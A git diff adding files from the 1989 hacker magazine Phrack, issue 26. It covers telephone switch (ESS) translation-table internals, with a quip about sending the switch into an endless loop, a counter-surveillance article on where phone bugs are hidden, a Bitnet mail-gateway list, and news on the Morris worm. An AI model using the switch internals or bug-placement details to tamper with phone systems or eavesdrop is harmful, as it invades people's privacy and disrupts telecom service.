+multilevel translators contain a maximum of six levels of information in the
+form of linked hierarchical tables:
+
+1- Head Table
+2- Subtranslator
+3- Primary translator word
+4- Auxiliary block or expansion table
+5- List
+6- Subauxiliary block
+
+(1) Head Table:  The HT is the "directory" for the translator.  It contains
+    addresses or pointers to each subtranslator.
+
+(2) Subtranslator:  The ST's are the main subdivisions, so as an office grows
+    larger, or as more features are added, the number of ST's grows larger.
+    For example, there is a translator for every 1,000 directory numbers, so if
+    an office grows from 3,000 to 8,000 lines, an extra 5 subtranslators must
+    be added.  Input for translation must contain 2 things:  A selector and an
+    index.  The selector contains the information as to which subtranslator to
+    use (in the case of DCF, the selector would either be an A, B, C, or D).
+    The index shows which item or word in that particular subtranslator to
+    access.  In the DCF example, if the selector were "D", the index could be
+    1, 2, 3, etc.
+
+(3) Primary Translation Word (PTW):  Each index points to a PTW, which is a
+    byte of information.  Often, all you need is 1 byte of information
+    (remember that each byte is 23 bits!).  If the data isn't stored in the
+    PTW, an address will be there to point to an auxiliary block or expansion
+    table, where the data will be found.  The ESS can recognize whether the
+    byte contains data or an address by:
+
+    1 ESS)   The 3 most significant bits will be 0.
+    1A ESS)  The 4 most significant bits will be 0.
+
+    So, if all the 3 (or 4 for 1A) most significant bits contain 0's, the word
+    will be interpreted as an address. (Anyone want to throw the ESS switch
+    into an endless loop????)
+(4) Auxiliary Block:  The first byte in the AB contains the length of the
+    block.  This byte is called the word number (WRDN), and is used by the ESS
+    so it knows where the auxiliary block ends. Remember that when the ESS
+    reads data, all it sees is:
+
+    110001011000101010100100101110010010101000101010100100101111
+
+    So, in order to stop at the end of the block, the WRDN number must be
+    present.
+
+(5) List:  The list is used when additional information other than the standard
+    found in the auxiliary block is needed.  The list, like the ST, has an
+    associated index.  The address of the list is found in the AB and the index
+    shows which item of data in the list should be looked at.  A good example
+    of what kind of information is found in the list would be a speed calling
+    list.
+
+(6) Subauxiliary Block:  The list is only large enough to hold a 7 digit phone
+    number, and if more information has to be stored (like a 10 digit phone
+    number or a trunk identity), an address is stored in the list that points
+    to an SB, which acts very much like an AB.
+
+Expansion Translator
+%%%%%%%%%%%%%%%%%%%%
+The expansion translator has one table (called an expansion table).  This type
+of translator gets only an index as input, since this type of translator is
+only a bunch of words.  It could have auxiliary blocks, if the space allocated
+to a word is too small.
+
+RECENT CHANGE AREA OF CALL STORE (1 ESS)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+The recent change area consists of:
+
++ primary recent change area
++ auxiliary recent change area
++ customer originated recent change (CORC)
+
+The starting and ending addresses for these rc areas are stored in the MHT.
+The primary recent change area is used to store changes affecting primary
+translation words.  Each change is stored in a primary RC register, which
+consists of two 23 bit bytes.  These two bytes contain status bits, primary
+translation address in the program store, and the primary translation word
+(PTW) address in call store.  The first byte in the register is the "address
+word" (AW) and the second is the new primary translation word.  When looking
+through the AW, bits 22 and 21 can tell you what kind of recent change is being
+implemented:
+
+11: temporary (not to be put into PS)
+10: permanent (to be put into PS)
+01: delayed (not active yet)
+00: deleted (this space is available)
+
+The PTW (abbreviations make things SO much easier) contains the translation
+data or the address of the auxiliary RC (TAG).  You can tell whether the data
+is an RC or an address by looking at bits 22 to 18.  If they are 0, then this
+byte contains an address, which is stored in bits 17 to 0.
+
+_______________________________________________________________________________
diff --git a/phrack26/7.txt b/phrack26/7.txt
new file mode 100644
index 0000000..e7c8600
--- /dev/null
+++ b/phrack26/7.txt
@@ -0,0 +1,141 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 7 of 11
+
+                 <><><><><><><><><><><><><><><><><><><><><><>
+                 <>                                        <>
+                 <>              PHONE BUGGING             <>
+                 <>                                        <>
+                 <>     Telecom's Underground Industry     <>
+                 <>                                        <>
+                 <>            By Split Decision           <>
+                 <>                                        <>
+                 <><><><><><><><><><><><><><><><><><><><><><>
+
+
+In today's landscape of insider trading, leveraged buyouts and merger mania,
+it is no great shock that a new underground industry has developed within
+telecom -- eavesdropping.
+
+Bugs are cheap (starting at $30) and can be installed in as little as 10
+seconds.  And you can bet your bottom $1 million that this expense pales in
+comparison to the rewards of finding out your takeover plans, marketing
+strategies, and product developments.
+
+According to Fritz Lang of Tactical Research Devices (Brewster, NY), there is a
+virtual epidemic of bugging going on in the American marketplace.  Counter-
+surveillance agencies like TRD have sprung up all over.  They search for
+eavesdropping equipment, then notify the client if they're being tapped.  It's
+up to the client to respond to the intrusion.
+
+Each of TRD's employees is a retired CIA or FBI operative.  Formerly, they
+planted bugs for Uncle Sam.  Since it's illegal to plant bugs for anyone else,
+these men now engage in counter surveillance work, pinpointing eavesdropping
+devices, and sometimes the culprits who put them there, for TRD's client
+companies.
+
+
+Where Do They Put The Bugs?
+%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Your TELEPHONE, of course, is a convenient place to install an eavesdropping
+device.  But this doesn't mean that the illegal tapping will be limited to your
+phone conversations.
+
+Electronic phones have microphones which are always "live," even when the
+telephone is on-hook.  Stick an amplifier and transmitting unit to the
+microphone, and you have constant surveillance of all conversations taking
+place in that room, whether or not the phone is off-hook at the time.
+
+A device rapidly gaining popularity among today's wire-tappers is a mouthpiece
+containing a tiny bug, which looks exactly like the one of your 2500 set.  All
+it takes is one trip to the water cooler or the men's room for the insider to
+surreptitiously make the old switcheroo.
+
+LOUDSPEAKERS are another favorite location for wire-tappers, because they can
+pick up conversations when not in use.  Paging systems, piped in music, and
+telephone systems all employ some variety of amplifier which the culprit can
+use to his advantage.
+
+LINE INTERCEPTORS allow eavesdroppers more extensive coverage of your
+activities, since they can monitor more than on-line communications from a
+single listening post.
+
+But really, the number of places you can find a bug is limited only by the
+tapper's imagination.  Light switches, plugs, clocks, calculators, legs of
+wooden chairs, staplers, ashtrays, the underside of a toilet bowl -- all of
+these items have proved fertile territory for the little critters.
+
+
+Tools For Finding The Bugs
+%%%%%%%%%%%%%%%%%%%%%%%%%%
+TRD's people use a patented Surveillance Search Receiver to locate the bugs.
+The Receiver uses a broad-band radio spectrum, from 25 kHz to 7 gHz.
+
+If there is an unaccounted-for radio frequency emission on the premises, the
+Receiver will tune it in on a small spectrum monitor.  It then traces the
+emission to its inevitable source, the bug.
+
+For room bugs, they also use a Non-Linear Junction Detector, which can pinpoint
+all electronic circuit diodes or resistors in the architecture of the building.
+
+The Detector emits a high microwave signal into walls, furniture, et al.,
+causing any circuit hidden within to oscillate.  As soon as they oscillate,
+they become detectable.
+
+Mr. Lang clears up a misconception about the Russians bugging our embassy in
+Moscow.  "They didn't riddle the building with actual bugs, instead, they
+buried millions of little resistors in the concrete."
+
+The embassy, therefore, became a hot bed for false alarms.  Whenever the
+American counter-measure people came in with their detectors to look for a bug,
+they'd pick up oscillation readings from the countless resistors and
+capacitors buried in the walls.  Finding any real bugs would be infinitely more
+difficult than finding the old needle in a haystack.
+
+For finding wire-taps along the phone lines, TRD uses a computerized electronic
+Telephone Analyzer.  The unit runs 18 different tests on phone lines between
+the CPE block and the Central Office (CO).  Resistance, voltage, and line
+balance are just a few of them.  Once they locate a tapped line, they send a
+pulse down it with a time-domain reflectometer, which can pinpoint exactly
+where in the line the bug has been affixed.
+
+Bear in mind that wire-tapping is extremely difficult and time consuming.  As
+much as 20 hours of conversations has to be monitored every single business
+day.  Because of this, key executives' telephones are usually the only ones
+slated for a wire-tap.
+
+
+Catching The Culprit
+%%%%%%%%%%%%%%%%%%%%
+Finding a wire-tap is easier than finding the spy who bugged your office.
+Direct hardwire taps can be traced to the remote location where the snoop
+stores his voltage-activated electronic tape recorder.  After you've found the
+monitoring post, it's a matter of hanging around the premises until someone
+comes to collect the old tapes and put in fresh ones.
+
+As for room bugs, your best bet is to make the device inoperable, without
+removing it, and wait for the eavesdropping to come back to fix or replace it.
+
+
+Once Is Never Enough
+%%%%%%%%%%%%%%%%%%%%
+Some of TRD's clients have their offices checked monthly, some quarterly.
+After the initial sweep, you can have equipment installed on your phone lines
+which constantly monitors any funny stuff.
+
+As for TRD, they offer a money-back guarantee if they fail to detect an
+existing bug on your premises.  Mr. Lang assures us that Fortune 500 company
+has been bugged to a greater or lesser extent.  That's how out-of-hand the
+problem is getting.
+
+Toward the end of our conversation, Mr. Lang pauses.  "So you're really going
+to print this, huh?  You're really on the up and up?"  Then he spills the
+beans.
+
+It turns out Mr. Fritz Lang is really Mr. Frank Jones (he says), a licensed
+private investigator with a broad reputation in the industry.  He used the
+alias because he suspected I was from a rival counter-measure agency, or worse,
+a wire-tapper, trying to infiltrate his operations.
+
+Which quite possibly I am.  You can't trust anybody in this spy business.
+_______________________________________________________________________________
diff --git a/phrack26/8.txt b/phrack26/8.txt
new file mode 100644
index 0000000..2d9bba1
--- /dev/null
+++ b/phrack26/8.txt
@@ -0,0 +1,656 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 8 of 11
+
+           <><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+           <>                                                    <>
+           <>       Future Transcendent Saga Appendix III        <>
+           <>                 "Limbo To Infinity"                <>
+           <>                                                    <>
+           <>                  Internet Domains                  <>
+           <>                                                    <>
+           <>                     April 1989                     <>
+           <>                                                    <>
+           <><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+Special thanks goes out to Henry Nussbacher who did the actual compiling of
+this list.  For those of you on Bitnet, you may have seen this previously in
+the form of BITNET GATES.
+
+For readers who are a little unsure of what this file shows, I will try to
+explain a little.  As you already know from the Future Transcendent Saga, there
+are many different networks all around the world.  Most of these networks are
+connected in some way, usually all being called the Internet.
+
+Now, as you should know, Taran King and Knight Lighting both have addresses on
+Bitnet that are on the node UMCVMB.BITNET.  However, this node also exists
+on the Internet in a different form:  UMCVMB.MISSOURI.EDU.
+
+EDU is the Internet domain for academic nodes.  Not every node on Bitnet has a
+translation on the Internet.  Then again, only a small fraction of the
+nodes on Internet have Bitnet equivalents.
+
+So what this file really shows is what network you are sending mail to when you
+have an address that contains a nodename or routing designation that looks a
+little strange.  For people on Bitnet it also shows what Bitnet address serves
+as the gateway between Bitnet and whichever network they are sending to on the
+Internet.
+
+The following is a table of gateways between Bitnet and other networks.  It is
+in the format of;
+
+Domain:       The upper level recognized name by the Columbia University VM
+              mail system.
+
+Name:         The descriptive name of this network.
+
+Gateway:      Where the mail is sent to in Bitnet.  Unless otherwise specified,
+              the gateway expects to receive a BSMTP (Batch Simple Mail
+              Transfer Protocol) envelope.  Users in general do not need to
+              worry about the contents of this field.  This is not a mailbox
+              for general questions but rather the server machine (daemon) that
+              acts as the transporter of mail from one network to another.
+              Software postmasters are expected to configure their system so
+              that their system sends to the nearest gateway and not to the
+              default gateway.
+
+Translation:  Upon occasion, certain addresses will be translated internally to
+              point to an indirect gateway.  In such a case, the complete
+              address is specified.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Internet Commercial Clients (COM)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Domain:     COM
+Name:       Internet - Commerical clients
+Gateway:    SMTP@INTERBIT
+
+Domain:     CRD.GE.COM
+Name:       General Electric Corporate Research & Development
+Gateway:    MAILER@GECRDVM1
+
+Domain:     HAC.COM
+Name:       Hughes Aircraft Co. Local Area Network
+Gateway:    SMTPUSER@YMIR
+
+Domain:     STARGATE.COM
+Name:       Stargate Information Service
+Gateway:    SMTP@UIUCVMD
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Internet Academic Clients (EDU)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Domain:     EDU
+Name:       Internet - Academic clients
+Gateway:    SMTP@INTERBIT
+
+Domain:     ARIZONA.EDU
+Name:       University of Arizona, Tucson
+Gateway:    SMTPUSER@ARIZRVAX
+
+Domain:     BATES.EDU
+Name:       Bates College Local Area Network
+Gateway:    MAILER@DARTCMS1
+
+Domain:     CMSA.BERKELEY.EDU
+Name:       University of California at Berkeley
+Gateway:    MAILER@UCBCMSA
+
+Domain:     BERKELEY.EDU
+Name:       University of California at Berkeley Campus Mail Network
+Gateway:    BSMTP@UCBJADE
+
+Domain:     BU.EDU
+Name:       Boston University Local Area Network
+Gateway:    MAILER@BUACCA
+
+Domain:     BUCKNELL.EDU
+Name:       Bucknell University Local Area Network
+Gateway:    SMTP@BKNLVMS
+
+Domain:     BUFFALO.EDU
+Name:       State University of New York at Buffalo
+Gateway:    SMTP@UBVM
+
+Domain:     BYU.EDU
+Name:       Brigham Young University Campus Network
+Gateway:    MAILER@BYUADMIN
+
+Domain:     CALTECH.EDU
+Name:       California Institute of Technology local area network
+Gateway:    MAILER@HAMLET
+
+Domain:     CLAREMONT.EDU
+Name:       Claremont Colleges Local Area Network
+Gateway:    SMTPUSER@YMIR
+
+Domain:     CLARKSON.EDU
+Name:       Clarkson University Local Area Network
+Gateway:    MAILER@CLVM
+
+Domain:     CMU.EDU
+Name:       Carnegie Mellon University Local Area Network
+Gateway:    MAILER@CMUCCVMA
+
+Domain:     COLORADO.EDU
+Name:       University of Colorado at Boulder Local Area Network
+Gateway:    SMTPUSER@COLORADO
+
+Domain:     COLUMBIA.EDU
+Name:       Columbia University Local Area Network
+Gateway:    MAILER@CUVMA
+
+Domain:     CONNCOLL.EDU
+Name:       Connecticut College Local Area Network
+Gateway:    MAILER@CONNCOLL
+
+Domain:     CORNELL.EDU
+Name:       Cornell University
+Gateway:    MAL@CORNELLC
+
+Domain:     CUN.EDU
+Name:       University of Puerto Rico
+Gateway:    SMTPUSER@UPRENET
+
+Domain:     CUNY.EDU
+Name:       City University of New York
+Gateway:    SMTP@CUNYVM
+
+Domain:     DARTMOUTH.EDU
+Name:       Dartmouth College Local Area Network
+Gateway:    MAILER@DARTCMS1
+
+Domain:     GATECH.EDU
+Name:       Georgia Institute of Technology Local Area Network
+Gateway:    MAILER@GITVM1
+
+Domain:     HAMPSHIRE.EDU
+Name:       Hampshire College Local Area Network
+Gateway:    MAILER@HAMPVMS
+
+Domain:     HARVARD.EDU
+Name:       Harvard University Local Area Network
+Gateway:    MAILER@HARVARDA
+
+Domain:     HAWAII.EDU
+Name:       University of Hawaii Local Area Network
+Gateway:    MAILER@UHCCUX
+
+Domain:     IASTATE.EDU
+Name:       Iowa State University Local Area Network
+Gateway:    MAILER@ISUMVS
+
+Domain:     KSU.EDU
+Name:       Kansas State University
+Gateway:    MAILER@KSUVM
+
+Domain:     LEHIGH.EDU
+Name:       Lehigh University Campus Network
+Gateway:    SMTPUSER@LEHIIBM1
+
+Domain:     LSU.EDU
+Name:       Louisiana State University local area network
+Gateway:    SMTPUSER@LSUVAX
+
+Domain:     MAINE.EDU
+Name:       University of Maine System
+Gateway:    MAILER@MAINE
+
+Domain:     MAYO.EDU
+Name:       Mayo Clinic LAN, Minnesota Regional Network
+Gateway:    SMTPUSER@UMNACVX
+
+Domain:     MIT.EDU
+Name:       MIT Local Area Network
+Gateway:    MAILER@MITVMA
+
+Domain:     NCSU.EDU
+Name:       North Carolina State University
+Gateway:    MAILER@NCSUVM
+
+Domain:     CCCC.NJIT.EDU
+Name:       NJIT Computer Conferencing Center
+Gateway:    MAILER@ORION
+Comments:   In process of establishing a single NJIT.EDU domain
+
+Domain:     NWU.EDU
+Name:       Northwestern University Local Area Network
+Gateway:    SMTPUSER@NUACC
+
+Domain:     NYU.EDU
+Name:       New York University/Academic Computing Facility LAN
+Gateway:    SMTP@NYUCCVM
+
+Domain:     OBERLIN.EDU
+Name:       Oberlin College
+Gateway:    SMTPUSER@OBERLIN
+
+Domain:     PEPPERDINE.EDU
+Name:       Pepperdine University
+Gateway:    MAILER@PEPVAX
+
+Domain:     PRINCETON.EDU
+Name:       Princeton University Local Area Network
+Gateway:    VMMAIL@PUCC
+
+Domain:     PURDUE.EDU
+Name:       Purdue University Campus Network
+Gateway:    MAILER@PURCCVM
+
+Domain:     RICE.EDU
+Name:       Rice University Local Area Network
+Gateway:    MAILER@RICE
+
+Domain:     ROSE-HULMAN.EDU
+Name:       Rose-Hulman Institute of Technology Local Area Network
+Gateway:    SMTPUSER@RHIT
+
+Domain:     SDSC.EDU
+Name:       San Diego Supercomputer Center
+Gateway:    MAILER@SDSC
+
+Domain:     STANFORD.EDU
+Name:       Stanford University Local Area Network
+Gateway:    MAILER@STANFORD
+
+Domain:     STOLAF.EDU
+Name:       St. Olaf College LAN, Minnesota Regional Network
+Gateway:    SMTPUSER@UMNACVX
+
+Domain:     SWARTHMORE.EDU
+Name:       Swarthmore College Local Area Network
+Gateway:    MAILER@SWARTHMR
+
+Domain:     SYR.EDU
+Name:       Syracuse University Local Area Network (FASTNET)
+Gateway:    SMTP@SUVM
+
+Domain:     TORONTO.EDU
+Name:       University of Toronto local area Network
+Gateway:    MAILER@UTORONTO
+
+Domain:     TOWSON.EDU
+Name:       Towson State University Network
+Gateway:    MAILER@TOWSONVX
+
+Domain:     TRINCOLL.EDU
+Name:       Trinity College - Hartford, Connecticut
+Gateway:    MAILER@TRINCC
+
+Domain:     TRINITY.EDU
+Name:       Trinity University
+Gateway:    MAILER@TRINITY
+
+Domain:     TULANE.EDU
+Name:       Tulane University local area Network
+Gateway:    MAILER@TCSVM
+
+Domain:     UAKRON.EDU
+Name:       University of Akron Campus Network
+Gateway:    MAILER@AKRONVM
+
+Domain:     UCAR.EDU
+Name:       National Center for Atmospheric Research Bldr CO
+Gateway:    SMTPSERV@NCARIO
+
+Domain:     UCHICAGO.EDU
+Name:       University of Chicago Local Area Network
+Gateway:    MAILER@UCHIMVS1
+
+Domain:     UCLA.EDU
+Name:       University of California Los Angeles
+Gateway:    MAILER@UCLAMVS
+
+Domain:     UCOP.EDU
+Name:       University of California, Office of the President
+Gateway:    BSMTP@UCBJADE
+
+Domain:     UCSB.EDU
+Name:       University of California, Santa Barbara
+Gateway:    MAILER@SBITP
+
+Domain:     UCSD.EDU
+Name:       University of California at San Diego Campus Mail Network
+Gateway:    MAILER@UCSD
+
+Domain:     UCSF.EDU
+Name:       Univ of California San Francisco Network
+Gateway:    BSMTP@UCSFCCA
+
+Domain:     UFL.EDU
+Name:       University of Florida, Gainesville, FL
+Gateway:    MAILER@NERVM
+
+Domain:     UGA.EDU
+Name:       University of Georgia Campus Network
+Gateway:    MAILER@UGA
+
+Domain:     UIC.EDU
+Name:       University of Illinois at Chicago
+Gateway:    MAILER@UICVM
+
+Domain:     UIUC.EDU
+Name:       University of Illinois at Urbana-Champaign Local Area Network
+Gateway:    SMTP@UIUCVMD
+
+Domain:     UKANS.EDU
+Name:       University of Kansas
+Gateway:    SMTPUSER@UKANVAX
+
+Domain:     UKY.EDU
+Name:       University of Kentucky
+Gateway:    MAILER@UKCC
+
+Domain:     UMN.EDU
+Name:       University of Minnesota LAN, Minnesota Regional Network
+Gateway:    SMTPUSER@UMNACVX
+
+Domain:     UNL.EDU
+Name:       University of Nebraska Lincoln
+Gateway:    SMTPUSER@UNLVAX1
+
+Domain:     UOREGON.EDU
+Name:       University of Oregon
+Gateway:    SMTPUSER@OREGON
+
+Domain:     URICH.EDU
+Name:       University of Richmond network
+Gateway:    SMTPUSER@URVAX
+
+Domain:     UPENN.EDU
+Name:       University of Pennsylvania Campus Network
+Gateway:    SMTPUSER@PENNLRSM
+
+Domain:     USC.EDU
+Name:       University of Southern California, Los Angeles
+Gateway:    SMTP@USCVM
+
+Domain:     UTAH.EDU
+Name:       University of Utah Computer Center
+Gateway:    SMTPUSER@UTAHCCA
+
+Domain:     UVCC.EDU
+Name:       Utah Valley Community College
+Gateway:    SMTPUSER@UTAHCCA
+
+Domain:     VCU.EDU
+Name:       Virginia Commonwealth University Internetwork
+Gateway:    SMTPUSER@VCURUBY
+
+Domain:     WASHINGTON.EDU
+Name:       University of Washington Local Area Network
+Gateway:    MAILER@UWAVM
+
+Domain:     WESLEYAN.EDU
+Name:       Wesleyan University Local Area Network
+Gateway:    MAILER@WESLEYAN
+
+Domain:     WISC.EDU
+Name:       University of Wisconsin Local Area Network
+Gateway:    SMTPUSER@WISCMAC3
+
+Domain:     WVNET.EDU
+Name:       West Virginia Network for Educational Telecomputing
+Gateway:    MAILER@WVNVAXA
+
+Domain:     YALE.EDU
+Name:       Yale University Local Area Network
+Gateway:    SMTP@YALEVM
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+United States Of America Government Domains
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Domain:     GOV
+Name:       Internet - Government clients
+Gateway:    SMTP@INTERBIT
+
+Domain:     JPL.NASA.GOV
+Name:       Jet Propulsion Laboratory
+Gateway:    MAILER@HAMLET
+
+Domain:     LBL.GOV
+Name:       Lawrence Berkeley Laboratory
+Gateway:    MAILER@LBL
+
+Domain:     NBS.GOV
+Name:       National Institute of Standards and Technology
+Gateway:    SMTPUSER@NBSENH
+
+Domain:     NSESCC.GSFC.NASA.GOV
+Name:       NASA Space and Earth Sciences Computing Center
+Gateway:    MAILER@SCFVM
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Italian National Network (IT)
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Domain:     IT
+Name:       Italian national network
+Gateway:    MAILER@ICNUCEVX
+
+Domain:     TO.CNR.IT
+Name:       CNR (Italian Research Council) Network
+Gateway:    CNRGATE@ITOPOLI
+
+Domain:     INFN.IT
+Name:       Italian Research Network
+Gateways:   MAILER@IBOINFN
+            INFNGW@IPIVAXIN
+Comments:   IPIVAXIN is to only be used as a backup gateway in the event that
+            IBOINFN is broken.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Other Standard Domains Not Previously Detailed
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Domain:     ARPA
+Name:       Advanced Research Projects Agency - US DOD
+Gateway:    SMTP@INTERBIT
+
+Domain:     AT
+Name:       University Network of Austria
+Gateway:    MAILER@AWIUNI11
+
+Domain:     BE
+Name:       Belgian Research Network
+Gateway:    MAILER@BEARN
+
+Domain:     CA
+Name:       Canadian mail domain
+Gateway:    MAILER@UTORGPU
+
+Domain:     CDN
+Name:       Canadian University X.400 Research Network
+Gateway:    MAILER@UWOCC1
+Comments:   The gateway at CERNVAX is no longer supported due to
+            the high cost of X.25 transfer over public data networks.
+
+Domain:     CERN
+Name:       Center for Nuclear Research Network
+Gateways:   1) MAILER@UWOCC1
+            2) MAILER@CERNVAX
+
+Domain:     CH
+Name:       Swiss University Mail Network(s)
+Gateway:    MAILER@CEARN
+
+Domain:     CHUNET
+Name:       Swiss University pilot X.400 Network
+Gateway:    MAILER@CERNVAX
+
+Domain:     DBP.DE
+Name:       German X.400 National Network
+Gateway:    MAILER@DFNGATE
+
+Domain:     DE
+Name:       EARN view of German academic networks
+Gateway:    MAILER@DEARN
+
+Domain:     DK
+Name:       Denmark's Internet Domain
+Gateway:    MAILER@NEUVM1
+
+Domain:     ES
+Name:       Spanish Internet Domain
+Gateway:    MAILER@EB0UB011
+
+Domain:     FI
+Name:       Finland's Internet Domain
+Gateway:    MAILER@FINHUTC
+
+Domain:     FR
+Name:       French University pilot X.400 Network
+Gateway:    MAILER@CERNVAX
+
+Domain:     HEPnet
+Name:       High Energy Physics network
+Gateway:    MAILER@LBL
+
+Domain:     IE
+Name:       Ireland Academic X25 Network
+Gateway:    MAILER@IRLEARN
+
+Domain:     IL
+Name:       Israeli Academic Research Network
+Gateway:    MAILER@TAUNIVM
+
+Domain:     IS
+Name:       Icelands Internet Domain
+Gateway:    MAILER@NEUVM1
+
+Domain:     JP
+Name:       Japanese network
+Gateway:    MAILER@JPNSUT00
+
+Domain:     MFENET
+Name:       Magnetic Fusion Energy Network
+Gateway:    MFEGATE@ANLVMS
+
+Domain:     MIL
+Name:       Internet - Military clients
+Gateway:    SMTP@INTERBIT
+
+Domain:     NET
+Name:       Internet - Network gateways
+Gateway:    SMTP@INTERBIT
+
+Domain:     NL
+Name:       Netherlands Internet Domain
+Gateway:    MAILER@HEARN
+
+Domain:     NO
+Name:       Norwegian Internet domain
+Gateway:    MAILER@NORUNIX
+
+Domain:     ORG
+Name:       Internet - Organizational clients
+Gateway:    SMTP@INTERBIT
+
+Domain:     PT
+Name:       National Scientific Computation Network (of Portugal)
+Gateway:    MLNET@PTIFM
+
+Domain:     SE
+Name:       SUNET, Swedish University NETwork
+Gateway:    MAILER@SEKTH
+
+Domain:     SG
+Name:       Singapore National Network
+Gateway:    MAILER@NUSVM
+
+Domain:     SUNET
+Name:       Swedish University X.400 Network
+Comments:   The gateways at CERNVAX and UWOCC1 are no longer supported
+            due to the high cost of X.25 transfer over public data
+            networks -- see domain SE
+
+Domain:     UK
+Name:       United Kingdom University/Research Network (Janet)
+Gateway:    MAILER@UKACRL
+Comments:   NRSname is basically a reversal of the domain address.
+            Example: user@GK.RL.AC.UK becomes user%UK.AC.RL.GK@AC.UK
+
+Domain:     UNINETT
+Name:       Norwegian University pilot X.400 Network
+Gateway:    MAILER@NORUNIX
+
+Domain:     US
+Name:       Internet - USA clients
+Gateway:    SMTP@INTERBIT
+
+Domain:     UTORONTO
+Name:       University of Toronto local area Network
+Gateway:    MAILER@UTORONTO
+
+Domain:     UUCP
+Name:       Unix Network
+Gateways:   1) MAILER@PSUVAX1   (USA)
+            2) MAILER@UWOCC1    (Canada)
+            3) BSMTP@UNIDO      (Germany)
+            4) MAILER@MCVAX     (Netherlands)
+Alternate addressing: user%node.UUCP@HARVARD.HARVARD.EDU
+                      user%node.UUCP@RUTGERS.EDU
+Comments:   Only users in Germany are allowed to send to UNIDO.  All
+            European users are recommended to use MCVAX.
+
+Domain:     WUSTL
+Name:       Washington University local area Network
+Gateway:    GATEWAY@WUNET
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Bitnet - Internet Regional Gateways
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+Below is a list of those sites that will handle regional traffic between
+Bitnet and the Internet:
+
+SMTP@CUNYVM
+SMT@CORNELLC
+MAILER@MITVMA
+MAILER@ICNUCEVM - available only for Italian nodes
+
+You should *ALWAYS* use the generic address of SMTP@INTERBIT and never any of
+the addresses mentioned above.  The addresses stated above are for
+informational and debugging purposes ONLY.  Failure to abide by this rule will
+cause the owners of the gateway to close their service to all Bitnet and EARN
+users.
+
+Indirect Domains
+%%%%%%%%%%%%%%%%
+Domains that are unreachable directly, but that the Internet exit of Mailer
+knows how to translate:
+
+Domain:     DEC
+Name:       Digital Equipment Internal Network (Easynet)
+Gateway:    SMTP@INTERBIT
+Sample:     user@domain.DEC
+Translated to: user%node.DEC@DECWRL.DEC.COM
+
+Domain:     OZ (soon to become OZ.AU)
+Name:       Australian University Network
+Gateway:    SMTP@INTERBIT
+Sample:     user@node.OZ
+Translated to: user%node.OZ@UUNET.UU.NET
+
+
+Domains that are unreachable directly but that are accessible by specifying the
+address explicitly:
+
+Name:       Xerox Internal Use Only Network (Grapevine)
+Sample:     user.Registry@Xerox.Com
+
+Name:       IBM Internal Use Only Network (VNET)
+Sample:     user@Vnet
+
+Comments:   1) Mail must be sent directly to user and not via a 3rd party
+               mailer (i.e. VM Mailer server)
+            2) User within Vnet must first receive approval within IBM to
+               establish a circuit and then initiate a virtual circuit.  A user
+               within Bitnet may not establish communications with a VNET user,
+               without the above requirement.
+            3) This gateway is only open to selected nodes within IBM which
+               have ties with academia (i.e. ACIS).
+_______________________________________________________________________________
diff --git a/phrack26/9.txt b/phrack26/9.txt
new file mode 100644
index 0000000..eebaad0
--- /dev/null
+++ b/phrack26/9.txt
@@ -0,0 +1,487 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 26, File 9 of 11
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        %%%%%%%%%%%   %%%%%%%%%   %%%%%%%        PWN
+            PWN                Issue XXVI/Part 1                PWN
+            PWN                                                 PWN
+            PWN                 April 25, 1989                  PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+Welcome to Issue XXVI of Phrack World News.  This issue features articles on
+Robert Tappen Morris, ITT, Telenet, PC Pursuit, a hacker's convention in
+Holland, government wiretapping, viruses, social security numbers, a rivalry
+between two different factions of TAP Magazine and much more.
+
+As we are getting closer to SummerCon '89, it is becoming increasingly
+more important for us to get an idea of who to be expecting and who we need to
+contact to supply with further information.
+
+Since we only communicate directly with a select group of people at this time,
+we recommend that you contact Red Knight, Aristotle, or Violence (or other
+members of the VOID hackers).  These people will in turn contact us and then we
+can get back to you.  Keep in mind that only people who are able to contact us
+will be receiving the exact location of SummerCon '89.
+
+Please do not wait till the last minute as important information and changes
+can occur at any time.
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Cornell Panel Concludes Morris Responsible For Computer Worm      April 6, 1989
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+By Dennis Meredith (Cornell Chronicle)
+
+Graduate student Robert Tappan Morris Jr., working alone, created and spread
+the "worm" computer program that infected computers nationwide last November,
+concluded an internal investigative commission appointed by Provost Robert
+Barker.
+
+The commission said the program was not technically a "virus" -- a program that
+inserts itself into a host program to propagate -- as it has been referred to
+in popular reports.  The commission described the program as a "worm," an
+independent program that propagates itself throughout a computer system.
+
+In its report, "The Computer Worm," the commission termed Morris's behavior "a
+juvenile act that ignored the clear potential consequences."  This failure
